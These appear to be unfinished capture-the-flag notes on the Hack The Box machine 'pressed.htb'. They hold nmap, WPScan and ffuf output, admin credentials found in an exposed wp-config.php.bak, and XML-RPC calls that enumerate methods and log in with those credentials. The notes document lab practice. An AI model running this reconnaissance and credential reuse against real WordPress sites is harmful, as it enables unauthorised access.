1. Nmap
sudo nmap -p- -sC -sV --vv pressed.htb -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 17:29 WEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:29
Completed NSE at 17:29, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:29
Completed NSE at 17:29, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:29
Completed NSE at 17:29, 0.00s elapsed
Initiating Ping Scan at 17:29
Scanning pressed.htb (10.129.136.28) [4 ports]
Completed Ping Scan at 17:29, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 17:29
Scanning pressed.htb (10.129.136.28) [65535 ports]
Discovered open port 80/tcp on 10.129.136.28
SYN Stealth Scan Timing: About 37.02% done; ETC: 17:31 (0:00:53 remaining)
Completed SYN Stealth Scan at 17:30, 59.44s elapsed (65535 total ports)
Initiating Service scan at 17:30
Scanning 1 service on pressed.htb (10.129.136.28)
Completed Service scan at 17:30, 7.27s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.136.28.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:30
Completed NSE at 17:30, 5.06s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:30
Completed NSE at 17:31, 2.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:31
Completed NSE at 17:31, 0.00s elapsed
Nmap scan report for pressed.htb (10.129.136.28)
Host is up, received echo-reply ttl 63 (0.039s latency).
Scanned at 2025-06-12 17:29:47 WEST for 74s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: UHC Jan Finals – New Month, New Boxes
|_http-generator: WordPress 5.9
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:31
Completed NSE at 17:31, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:31
Completed NSE at 17:31, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:31
Completed NSE at 17:31, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.38 seconds
Raw packets sent: 131117 (5.769MB) | Rcvd: 43 (1.876KB)
2. Port 80
WhatWeb
whatweb http://pressed.htb
http://pressed.htb [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.129.136.28], JQuery[3.6.0], MetaGenerator[WordPress 5.9], Script[text/javascript], Title[UHC Jan Finals – New Month, New Boxes], UncommonHeaders[link], WordPress[5.9]
Wordpress
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[+] URL: http://pressed.htb/ [10.129.136.28]
[+] Started: Thu Jun 12 17:31:59 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://pressed.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://pressed.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://pressed.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://pressed.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.9 identified (Insecure, released on 2022-01-25).
| Found By: Rss Generator (Passive Detection)
| - http://pressed.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.9</generator>
| - http://pressed.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.9</generator>
[+] WordPress theme in use: retrogeek
| Location: http://pressed.htb/wp-content/themes/retrogeek/
| Last Updated: 2024-04-26T00:00:00.000Z
| Readme: http://pressed.htb/wp-content/themes/retrogeek/README.txt
| [!] The version is out of date, the latest version is 0.7
| Style URL: http://pressed.htb/wp-content/themes/retrogeek/style.css?ver=42
| Style Name: RetroGeek
| Style URI: https://tuxlog.de/retrogeek/
| Description: A lightweight, minimal, fast and geeky retro theme remembering the good old terminal times...
| Author: tuxlog
| Author URI: https://tuxlog.de/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 0.5 (80% confidence)
| Found By: Style (Passive Detection)
| - http://pressed.htb/wp-content/themes/retrogeek/style.css?ver=42, Match: 'Version: 0.5'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <===============================================================> (137 / 137) 100.00% Time: 00:00:01
[i] Config Backup(s) Identified:
[!] http://pressed.htb/wp-config.php.bak
| Found By: Direct Access (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Thu Jun 12 17:32:07 2025
[+] Requests Done: 173
[+] Cached Requests: 5
[+] Data Sent: 42.833 KB
[+] Data Received: 125.936 KB
[+] Memory used: 262.746 MB
[+] Elapsed time: 00:00:08
backup file found
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://pressed.htb/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://pressed.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# [Status: 200, Size: 22430, Words: 1175, Lines: 185, Duration: 123ms]
# directory-list-2.3-small.txt [Status: 200, Size: 22430, Words: 1175, Lines: 185, Duration: 130ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 22430, Words: 1175, Lines: 185, Duration: 130ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 290ms]
wp-content [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 39ms]
# on at least 3 different hosts [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 1282ms]
# [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 2292ms]
wp-includes [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 39ms]
# Priority-ordered case-sensitive list, where entries were found [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 3308ms]
# Copyright 2007 James Fisher [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 3315ms]
# [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 3316ms]
# [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 4080ms]
[Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 4087ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 4326ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 4338ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 4339ms]
wp-admin [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 38ms]
[Status: 200, Size: 16465, Words: 655, Lines: 185, Duration: 81ms]
:: Progress: [87664/87664] :: Job [1/1] :: 1020 req/sec :: Duration: [0:01:40] :: Errors: 0 ::
creds found admin:uhc-jan-finals-2021
these creds do not work. changing year
creds found admin:uhc-jan-finals-2022 worked and asked for a OTP 
There is also xmlrpc that we can interact with:
import xmlrpc.client
# Replace with the XML-RPC server's address
server = xmlrpc.client.ServerProxy('http://pressed.htb/xmlrpc.php')
# Call a method on the server
result = server.system.listMethods()
print(result)
- Found htb.get_flag()
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param>
<value><string>admin</string></value>
</param>
<param>
<value><string>uhc-jan-finals-2022</string></value>
</param>
</params>
</methodCall>
Try to see the userage page contents?